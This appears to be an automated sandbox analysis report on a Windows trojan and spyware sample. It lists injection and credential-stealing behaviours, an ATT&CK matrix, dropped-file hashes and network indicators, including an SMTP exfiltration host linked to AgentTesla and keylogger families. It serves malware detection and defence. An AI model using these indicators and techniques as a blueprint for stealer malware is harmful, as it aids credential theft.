---|
Source: | Process created / APC Queued / Resumed: | Jump to behavior |
Source: | Thread APC queued: | Jump to behavior |
Source: | Memory written: | Jump to behavior |
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Code function: | 0_2_00405D13 |
Stealing of Sensitive Information |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | File source: | ||
Source: | File source: |
Remote Access Functionality |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 121 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Obfuscated Files or Information | 1 OS Credential Dumping | 2 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
Credentials | Domains | Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | 311 Process Injection | 1 Software Packing | LSASS Memory | 24 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 DLL Side-Loading | Security Account Manager | 321 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Masquerading | NTDS | 1 Process Discovery | Distributed Component Object Model | 1 Clipboard Data | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 141 Virtualization/Sandbox Evasion | LSA Secrets | 141 Virtualization/Sandbox Evasion | SSH | Keylogging | 23 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 311 Process Injection | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 1 System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
16% | ReversingLabs | Win32.Trojan.Generic |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
us2.smtp.mailhostbox.com | 208.91.199.223 | true | true | unknown | |
s-part-0017.t-0009.fb-t-msedge.net | 13.107.253.45 | true | false | high | |
drive.google.com | 216.58.206.46 | true | false | high | |
drive.usercontent.google.com | 142.250.185.193 | true | false | high | |
api.ipify.org | 172.67.74.152 | true | false | high | |
ip-api.com | 208.95.112.1 | true | false | high | |
smtp.santonswitchgears.com | unknown | unknown | true | unknown |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false | high | ||
false | high |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
142.250.185.193 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false | |
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false | |
208.91.199.223 | us2.smtp.mailhostbox.com | United States | 394695 | PUBLIC-DOMAIN-REGISTRYUS | true | |
216.58.206.46 | drive.google.com | United States | 15169 | GOOGLEUS | false | |
172.67.74.152 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false |
Joe Sandbox version: | 41.0.0 Charoite |
Analysis ID: | 1549408 |
Start date and time: | 2024-11-05 16:08:57 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 6m 58s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 10 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | ulf4JrCRk2.exerenamed because original name is a hash value |
Original Sample Name: | 26d13e127041233e0a01a631c489b05b175a3c91a2cb2bf289a4188d483d317c.exe |
Detection: | MAL |
Classification: | mal100.troj.spyw.evad.winEXE@17/11@5/5 |
EGA Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
- Excluded domains from analysis (whitelisted): azurefd-t-fb-prod.trafficmanager.net, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
- Execution Graph export aborted for target powershell.exe, PID 2804 because it is empty
- Not all processes where analyzed, report is missing behavior information
- Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
- VT rate limit hit for: ulf4JrCRk2.exe
Time | Type | Description |
---|---|---|
10:09:49 | API Interceptor | |
10:10:25 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
208.95.112.1 | Get hash | malicious | AgentTesla, GuLoader | Browse |
| |
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | XWorm | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | XWorm | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
208.91.199.223 | Get hash | malicious | AgentTesla, GuLoader | Browse | ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |||
Get hash | malicious | AgentTesla | Browse | |||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | |||
172.67.74.152 | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | RDPWrap Tool | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Xmrig | Browse |
| ||
Get hash | malicious | Xmrig | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | LummaC, PrivateLoader, Stealc, Vidar | Browse |
| ||
Get hash | malicious | RDPWrap Tool | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
us2.smtp.mailhostbox.com | Get hash | malicious | AgentTesla, GuLoader | Browse |
| |
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
ip-api.com | Get hash | malicious | AgentTesla, GuLoader | Browse |
| |
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | XWorm | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | XWorm | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
s-part-0017.t-0009.fb-t-msedge.net | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | HTMLPhisher, Mamba2FA | Browse |
| ||
Get hash | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, XWorm | Browse |
| ||
Get hash | malicious | AgentTesla, PureLog Stealer | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | CryLock, LOCKFILE | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
| ||
api.ipify.org | Get hash | malicious | AgentTesla | Browse |
| |
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
Get hash | malicious | AgentTesla, PureLog Stealer | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Targeted Ransomware | Browse |
| ||
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | AgentTesla, GuLoader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
TUT-ASUS | Get hash | malicious | AgentTesla, GuLoader | Browse |
| |
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | XWorm | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | XWorm | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
PUBLIC-DOMAIN-REGISTRYUS | Get hash | malicious | AgentTesla, GuLoader | Browse |
| |
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | AgentTesla, PureLog Stealer | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | XWorm | Browse |
| ||
Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse |
| ||
CLOUDFLARENETUS | Get hash | malicious | HTMLPhisher, Mamba2FA | Browse |
| |
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | LummaC | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
3b5074b1b5d032e5620f69f9f700ff0e | Get hash | malicious | AgentTesla | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
| ||
Get hash | malicious | AgentTesla, PureLog Stealer | Browse |
| ||
Get hash | malicious | LummaC, XWorm | Browse |
| ||
37f463bf4616ecd445d4a1937da06e19 | Get hash | malicious | AgentTesla, GuLoader | Browse |
| |
Get hash | malicious | GuLoader | Browse |
| ||
Get hash | malicious | GuLoader, StormKitty, XWorm | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
Get hash | malicious | DarkCloud | Browse |
| ||
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
Get hash | malicious | GuLoader | Browse |
| ||
Get hash | malicious | GuLoader, Snake Keylogger | Browse |
| ||
Get hash | malicious | FormBook, GuLoader | Browse |
|
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 14744 |
Entropy (8bit): | 4.992175361088568 |
Encrypted: | false |
SSDEEP: | 384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdBMNXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdBMNZiA |
MD5: | A35685B2B980F4BD3C6FD278EA661412 |
SHA1: | 59633ABADCBA9E0C0A4CD5AAE2DD4C15A3D9D062 |
SHA-256: | 3E3592C4BA81DC975DF395058DAD01105B002B21FC794F9015A6E3810D1BF930 |
SHA-512: | 70D130270CD7DB757958865C8F344872312372523628CB53BADE0D44A9727F9A3D51B18B41FB04C2552BCD18FAD6547B9FD0FA0B016583576A1F0F1A16CB52EC |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\ulf4JrCRk2.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1364950 |
Entropy (8bit): | 4.01596624783414 |
Encrypted: | false |
SSDEEP: | 12288:RUXf2bA7Qhduz3IlubXO2cabU5YpEhLR659UbGM:kUhUz3fO2yl89Ubn |
MD5: | B15E100E9C866F683BF95DB114620042 |
SHA1: | FF1A4A98FB030DE62A0F1AAD24C6F534E76AC892 |
SHA-256: | 144180F59D06AC3935519D7159AB9ACFE85D7F6C9A70F0CA58B5132A32DFF8A7 |
SHA-512: | BE25270D5C093F9FDEEB03C1D0DB3449536D409C719A7A3B7A2CEA4EC9C4F0A3E1658509127C1F75D8EEADF9C9C1996D3E5607AAB85AC4977E9CA3E822AFA089 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\ulf4JrCRk2.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 74361 |
Entropy (8bit): | 5.139691996852477 |
Encrypted: | false |
SSDEEP: | 1536:3RoLfsJqYSdQi9UVJ317waflwDB6ABq6Ic:3RoQJSQi9UVp17xaBXAA |
MD5: | 0C815073424B00B92FC425368C6F7131 |
SHA1: | 3D1D9EBF91B36AF214735949192D6155005D17F1 |
SHA-256: | 9680749A477B196DBC127709BCF3C0BC2BA2CD2EF3B1D81F3BADC0E2FD1FBCDF |
SHA-512: | 009D9D4574039AE8A5852E0D2EED1844D106274508C0365E04D22394507ADBF1CCBCA6D5FBD30740BCD9125397BC57F2D643F512F8D0D5F85FE1A673791A2D3A |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\ulf4JrCRk2.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 395975 |
Entropy (8bit): | 7.668649303851621 |
Encrypted: | false |
SSDEEP: | 12288:0UXf2bA7Qhduz3IlubXO2cabU5YpEhLR6C:hUhUz3fO2ylT |
MD5: | 9932684265774F8D8F1E0EDE73C93A94 |
SHA1: | 40C42BB51ADB70F3225EC91AA66C954CF6629607 |
SHA-256: | 4D05D20984F566FA5E3741D3A0565E294D98416F78CFFC819FBA000D7259CBFC |
SHA-512: | D889DD59CB51500BC17B9F81BA1BE5CAB98A9CE8A10E15A1CE374639B6F572738E1DF7360582E160A5A876BF5F301403CC7C937D639A1C7E7FB8DFC4BC65F2D3 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\ulf4JrCRk2.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 401 |
Entropy (8bit): | 4.3081571951748 |
Encrypted: | false |
SSDEEP: | 6:Qz1k+ipwZQRjLDgRuJO6LfZ+3eoaaXxZ4lDvxFJoAc4SKpr7l1zR8xWtn:g7SwZAgRuJ7LQ3eolsDvxvoAyCzRyWt |
MD5: | 3CCD7CE3AEADE62D54268376DE39516D |
SHA1: | 3A6C81F87F5DFFC16D6F83B80BACB7986F449A92 |
SHA-256: | 923C9A43BB424B083E8C9F4AF6D7542DFD314DE4774CFA4A2C02078A8824F870 |
SHA-512: | 641B40048461820C1B6708662EB89B3C814EB9D81C02407074439253B908F9B706A58F416103093D45181D3A1A79976ED2B317B8B107A16C83346693357B3717 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\ulf4JrCRk2.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 489222 |
Entropy (8bit): | 1.2506752052648178 |
Encrypted: | false |
SSDEEP: | 1536:KRRhfB9L9tO+zdfjXM6/cCVa5RrtfOvY0tl:O/9oQzM+vutfOQY |
MD5: | 4D738E5B430D2DA5F5440BFBA5E0C83C |
SHA1: | 3B73C8D8E4291DE2C588D56F6B0911D068B27363 |
SHA-256: | 67733DF8EAC8617D961458E56C3D8D7265F26519D4E50AF7FA62C081363E50CE |
SHA-512: | F14D6BC66B42591EDD5CAC6D80583C22F49484EDDE03CBC19616DE5E2F279479FD5D6CD0C8A76BAFB645178BD964A17E91EBCAA050F06818C1000FCE7712C8C0 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\ulf4JrCRk2.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 397443 |
Entropy (8bit): | 1.2507334034977688 |
Encrypted: | false |
SSDEEP: | 768:rutC7/xNChL15JkoO+lJmgozzros+eJn+GYSNODnOaFm3FU4lEQ08aWEwPCWDTLH:DKytNBgY6Q8JMdL4xiMp/7Cgvsww1I8 |
MD5: | 52277EFB876A67F81E5C8478D30F0940 |
SHA1: | 12B0B6D0DED14774C04AE561947C5F99F8046AF8 |
SHA-256: | 3688D48D11BB36B7C25270DE4B4D3C04181121AFCAFFD52A9F9C3FE7B69A2D42 |
SHA-512: | 356CD3B38AEC9B8AE7D831921A2BE60E80983F242D0E9DBBD60AE3CAB4A63DBFD35F12EC055975046070BABD71D847C0A2AD4578D02E845D0753BF7FF56C57E6 |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 7.674157022598364 |
TrID: |
|
File name: | ulf4JrCRk2.exe |
File size: | 748'528 bytes |
MD5: | a8a9f68888009bf9737238846f3b6ec3 |
SHA1: | 328fc40462eca7d498bfe67b17a01a1ff009796b |
SHA256: | 26d13e127041233e0a01a631c489b05b175a3c91a2cb2bf289a4188d483d317c |
SHA512: | a77cd1aa5d16e0747afdbd5a7d256520076d9e8a18927c367254f8de85490872e1d97307f93b407f04893f5414534f691394b1ba45ae3d6c36fb8eda3d4aebb8 |
SSDEEP: | 12288:8KzIabEV5n4lymBGY1FXYxV6eIrWgVHlDL/eM0fyQCx:8KzIcEc7Bt1gV6FVwYx |
TLSH: | D3F4F192F2C169DBC48256B985B9D730007F9F80662D066E3649793D9FB23006AC7FDB |
File Content Preview: | MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L....n3T.................\...........2.......p....@ |
Icon Hash: | 7d4d4dd45f59ec13 |
Entrypoint: | 0x403217 |
Entrypoint Section: | .text |
Digitally signed: | true |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE |
DLL Characteristics: | DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE |
Time Stamp: | 0x54336EB1 [Tue Oct 7 04:40:17 2014 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 4 |
OS Version Minor: | 0 |
File Version Major: | 4 |
File Version Minor: | 0 |
Subsystem Version Major: | 4 |
Subsystem Version Minor: | 0 |
Import Hash: | 59a4a44a250c4cf4f2d9de2b3fe5d95f |
Signature Valid: | false |
Signature Issuer: | CN="Aldres Paakendelsens ", E=rdbedens@Foreller.Su, L=Pipriac, S=Bretagne, C=FR |
Signature Validation Error: | A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider |
Error Number: | -2146762487 |
Not Before, Not After |
|
Subject Chain |
|
Version: | 3 |
Thumbprint MD5: | 44496AA563AC7865B0BE61FFDAFACCF3 |
Thumbprint SHA-1: | 49D174754FBD230609EE4A19CA5DA566C6025CE4 |
Thumbprint SHA-256: | 7DE023652651A9A01E3B7F3406EAB3DA91DD2EBDAF886F1FEF0A41AF6EDE7577 |
Serial: | 188FEAED300598C1C64FBA42DB3B7B0BA158602F |
Instruction |
---|
sub esp, 00000184h |
push ebx |
push ebp |
push esi |
xor ebx, ebx |
push edi |
mov dword ptr [esp+18h], ebx |
mov dword ptr [esp+10h], 00409130h |
mov dword ptr [esp+20h], ebx |
mov byte ptr [esp+14h], 00000020h |
call dword ptr [00407034h] |
push 00008001h |
call dword ptr [004070B4h] |
push ebx |
call dword ptr [0040728Ch] |
push 00000009h |
mov dword ptr [004237B8h], eax |
call 00007FAE707CC6B5h |
mov dword ptr [00423704h], eax |
push ebx |
lea eax, dword ptr [esp+38h] |
push 00000160h |
push eax |
push ebx |
push 0041ECB8h |
call dword ptr [00407164h] |
push 004091E4h |
push 00422F00h |
call 00007FAE707CC35Fh |
call dword ptr [004070B0h] |
mov ebp, 00429000h |
push eax |
push ebp |
call 00007FAE707CC34Dh |
push ebx |
call dword ptr [00407118h] |
cmp byte ptr [00429000h], 00000022h |
mov dword ptr [00423700h], eax |
mov eax, ebp |
jne 00007FAE707C98FCh |
mov byte ptr [esp+14h], 00000022h |
mov eax, 00429001h |
push dword ptr [esp+14h] |
push eax |
call 00007FAE707CBDDDh |
push eax |
call dword ptr [00407220h] |
mov dword ptr [esp+1Ch], eax |
jmp 00007FAE707C99B5h |
cmp cl, 00000020h |
jne 00007FAE707C98F8h |
inc eax |
cmp byte ptr [eax], 00000020h |
je 00007FAE707C98ECh |
Programming Language: |
|
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x73a4 | 0xb4 | .rdata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x37000 | 0x28500 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xb6268 | 0x988 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x298 | .rdata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|---|
